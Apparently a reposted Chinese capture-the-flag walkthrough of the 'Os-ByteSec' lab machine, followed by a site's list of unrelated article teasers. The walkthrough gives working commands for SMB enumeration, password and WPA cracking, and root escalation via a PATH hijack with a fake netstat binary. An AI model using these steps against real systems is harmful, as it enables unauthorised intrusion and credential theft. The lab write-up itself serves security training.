Os-ByteSec

Os-ByteSec

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.144

    在这里插入图片描述

  • 端口扫描,开放了80、139、445、2525端口

    在这里插入图片描述

二、信息收集

  • 访问80端口

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.144/" -e *
    

    在这里插入图片描述

  • 访问扫描出来的路径,没有发现有价值的信息

    http://192.168.80.144/css/         
    http://192.168.80.144/gallery/    
    http://192.168.80.144/html/                                    
    http://192.168.80.144/img/        
    http://192.168.80.144/index.html                                     
    http://192.168.80.144/js/          
    http://192.168.80.144/news/
    
  • 在网站下边发现了一个提示,是不是暗示着对SMB进行渗透

    在这里插入图片描述

三、SMB渗透

  • SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,它允许应用程序和终端用户从远端的文件服务器访问文件资源

  • 查询靶机中的用户信息

    enum4linux -U 192.168.80.144enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息
    

    在这里插入图片描述

  • 爆破用户smb密码,密码为空

    acccheck -t 192.168.80.144 -u smb -v
    

    在这里插入图片描述

  • 枚举靶机的共享资源

    smbmap -u 'smb' -p '' -H 192.168.80.144
    

    在这里插入图片描述

  • 查看靶机的共享目录

    smbclient -L 192.168.80.144 -U smb
    

    在这里插入图片描述

  • 通过SMB登录靶机

    smbclient //192.168.80.144/print$ -U smb
    

    在这里插入图片描述

  • 发现里面的文件全是0字节,但是发现了一个.目录,是不是指定smb用户的家目录呢,试一下

    smbclient //192.168.80.144/smb -U smb 
    

    在这里插入图片描述

  • 发现两个文件,其中main文件只有一个hello

    在这里插入图片描述

  • 将另一个文件下载下来

    在这里插入图片描述

四、密码破解

  • 尝试解压safe.zip,发现需要密码,爆破密码

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip或者zip2john safe.zip > pass
    john pass密码hacker1
    

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

  • 解压得到两个文件,secret.jpg和user.cap,图片没啥利用价值,使用wireshark打开user.cap文件进行分析,是个无线数据包,wifi名为blackjax,使用aircrack-ng破解user.cap文件,得到密码为snowflake

    aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
    

    在这里插入图片描述

五、权限提升

  • 使用刚才得到的用户名密码登录ssh,得到第一个flag

    blackjax:snowflake
    ssh blackjax@192.168.80.144 -p 2525
    

    在这里插入图片描述

  • 该用户不能执行sudo

    在这里插入图片描述

  • 查看系统中带SUID的程序

    find / -user root -perm -4000 -print 2>/dev/null
    

    在这里插入图片描述

  • 其中netscan比较可疑,执行该命令

    在这里插入图片描述

  • 下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令

    scp -P 2525 blackjax@192.168.80.144:/usr/bin/netscan /tmpstrace -f /tmp/netscan
    

    在这里插入图片描述

    在这里插入图片描述

  • 通过劫持环境变量来让netscan在执行时执行其他命令

    # tmp有写权限
    echo "/bin/sh" > /tmp/netstat
    chmod 777 /tmp/netstat
    export PATH=/tmp:$PATH 
    netscan
    
  • 提权成功

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/146810.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Idea安装完成配置

目录: 环境配置Java配置Maven配置Git配置 基础设置编码级设置File Header自动生成序列化编号配置 插件安装MyBtisPlusRestfulTooklkit-fix 环境配置 Java配置 Idea右上方,找到Project Settings. 有些版本直接有,有些是在设置下的二级菜单下…

LLM实现RPA

“PROAGENT: 从机器人流程自动化到代理流程自动化”这篇论文有几个创新点是比较有意思的:1.通过描述方式生成执行链,执行链通过代码方式生成保证执行链的稳健、可约束2.对执行过程抽取出数据结构,数据结构也通过代码生成方式来约束3.整个过程…

Web之CSS笔记

Web之HTML、CSS、JS 二、CSS(Cascading Style Sheets层叠样式表)CSS与HTML的结合方式CSS选择器CSS基本属性CSS伪类DIVCSS轮廓CSS边框盒子模型CSS定位 Web之HTML笔记 二、CSS(Cascading Style Sheets层叠样式表) Css是种格式化网…

【论文阅读】基于隐蔽带宽的汽车控制网络鲁棒认证(一)

文章目录 Abstract第一章 引言1.1 问题陈述1.2 研究假设1.3 贡献1.4 大纲 第二章 背景和相关工作2.1 CAN安全威胁2.1.1 CAN协议设计2.1.2 CAN网络攻击2.1.3 CAN应用攻击 2.2 可信执行2.2.1 软件认证2.2.2 消息身份认证2.2.3 可信执行环境2.2.4 Sancus2.2.5 VulCAN 2.3 侧信道攻…

竞赛 题目:基于深度学习卷积神经网络的花卉识别 - 深度学习 机器视觉

文章目录 0 前言1 项目背景2 花卉识别的基本原理3 算法实现3.1 预处理3.2 特征提取和选择3.3 分类器设计和决策3.4 卷积神经网络基本原理 4 算法实现4.1 花卉图像数据4.2 模块组成 5 项目执行结果6 最后 0 前言 🔥 优质竞赛项目系列,今天要分享的是 基…

Windows 11 设置 wsl-ubuntu 使用桥接网络

Windows 11 设置 wsl-ubuntu 使用桥接网络 0. 背景1. Windows 11 下启用 Hyper-V2. 使用 Hyper-V 虚拟交换机管理器创建虚拟网络3. 创建 .wslconfig 文件4. 配置 wsl.conf 文件5. 配置 wsl-network.conf 文件和 resolv.conf6. 创建 00-wsl2.yaml7. 安装 net-tools 和 openssh-s…

c# webapi 处理跨源问题

利用cors中间件处理跨源问题。 首先,什么是跨域(跨源)问题: 是指不同站点之间,使用ajax无法相互调用的问题。跨域问题本质是浏览器的一种保护机制,它的初衷是为了保证用户的安全,防止恶意网站窃…

除了chatGPT网站外,国内有些可以使用的AI网站 文心一言 讯飞星火 豆包 通义千问 人工智能网站 AI网站

2023年随着人工智能技术的不断发展,AI网站如ChatGPT等越来越受到人们的关注。这些网站具有多种作用,可以帮助人们更方便地获取信息、解决问题,甚至进行创作。 首先,AI网站可以提供智能问答服务。与传统的搜索引擎相比&#xff0c…

es 算法函数 有点不太懂了没有大神给指点一下

我先说一下我对算法分析的理解 算法函数,我们使用算法函数给指定的数据提高对应的值的方式 比如我现在要给一家酒店排名提高排名,我们可以利用算法函数,提高酒店排名,因为酒店的名称 相关算法的使用场景 在使用的时候出现了这…

CI/CD --git版本控制系统

目录 一、git简介 二、git使用 三、github远程代码仓库 一、git简介 Git特点: 速度简单的设计对非线性开发模式的强力支持(允许成千上万个并行开发的分支)完全分布式有能力高效管理类似 Linux 内核一样的超大规模项目(速度和数…

【有源码】基于asp.net的旅游度假村管理系统C#度假村美食住宿一体化平台源码调试 开题 lw ppt

💕💕作者:计算机源码社 💕💕个人简介:本人七年开发经验,擅长Java、Python、PHP、.NET、微信小程序、爬虫、大数据等,大家有这一块的问题可以一起交流! 💕&…

ChatGPT暂时停止开通puls,可能迎来封号高峰期

前言: 前两日,chat gpt的创始人 San Altman在网上发表了,由于注册的使用量超过了他们的承受能力,为了确保每个人的良好使用体验,chat gpt将暂时停止开通gpt plus。 情况: 前段时间好像出现了官网崩溃的情况,就连api key都受到了影响,所以现在就开始了暂时停止puls的注…

解锁编程潜能:探索亚马逊CodeWhisperer,打造编程世界的声音引导者

文章目录 前言一、什么是 Amazon CodeWhisperer?二、如何使用CodeWhisperer?安装CodeWhisperer插件配置CodeWhisperer生成注释和文档 总结 前言 随着CHATGPT的一声巨响,大语言模型已经成为了一个备受瞩目的创新应用。亚马逊云科技作为全球领…

二叉树的遍历(非递归版)

文章目录 二叉树的前序遍历二叉树的中序遍历二叉树的后序遍历 正文开始前给大家推荐个网站,前些天发现了一个巨牛的 人工智能学习网站, 通俗易懂,风趣幽默,忍不住分享一下给大家。 点击跳转到网站。 二叉树的前序遍历 用递归实…

想要精通算法和SQL的成长之路 - 摩尔投票法的运用

想要精通算法和SQL的成长之路 - 摩尔投票法的运用 前言一. 多数元素1.1 摩尔投票法 二. 多数元素II2.1 分析 前言 想要精通算法和SQL的成长之路 - 系列导航 一. 多数元素 原题链接 1.1 摩尔投票法 简单来说,假设数组 num 的众数是 x,数组长度为n。 有…

人工智能基础_机器学习044_逻辑回归代码实现与手动计算概率---人工智能工作笔记0084

上面我们已经把逻辑回归的公式,以及,公式对应的图形都画画出来了,然后我们再来看看 如何用代码实现 可以看到上面是代码,咱们自己去写一下 import numpy as np from sklearn.linear_model import LogistieRegression from sklearn import datasets # 训练数据和测试数据拆分…

【Proteus仿真】【Arduino单片机】DS1302时钟

文章目录 一、功能简介二、软件设计三、实验现象联系作者 一、功能简介 本项目使用Proteus8仿真Arduino单片机控制器,使用PCF8574、LCD1602液晶、DS1302等。 主要功能: 系统运行后,LCD1602显示时间日期。 二、软件设计 /* 作者:…

C语言第入门——第十六课

目录 一、分治策略与递归 二、递归 1.求解n的阶乘 2.输入整数、倒序输出 3.输入整数、正序输出 4.计算第n位Fibonacci数列 ​编辑5.无序整数数组打印 6.找到对应数组下标 一、分治策略与递归 在我们遇到大问题的时候,我们的正确做法是将它分解成小问题&a…

章鱼网络在 NEARCON23 发布 Octopus 2.0

香港时间2023年11月8日12点,章鱼网络举行第15期 Community Call。 我们在10月8日庆祝了章鱼网络主网上线二周年,并参加了激动人心的 Cosmoverse2023 活动。最重要的是,我们在 Octopus 2.0 的开发中取得了重大进展。 11月8日 Community Call …

装修干货|卧室常见3个软装搭配问题。福州中宅装饰,福州装修

引言 作为一名软装设计师,我对卧室的家具及软装布置颇有心得,现在就给你们带来卧室装修设计一些小技巧: 1. 床;衣柜;床头柜的摆放 床的摆放位置非常重要,一般要放在离窗户稍远的地方,避免直接…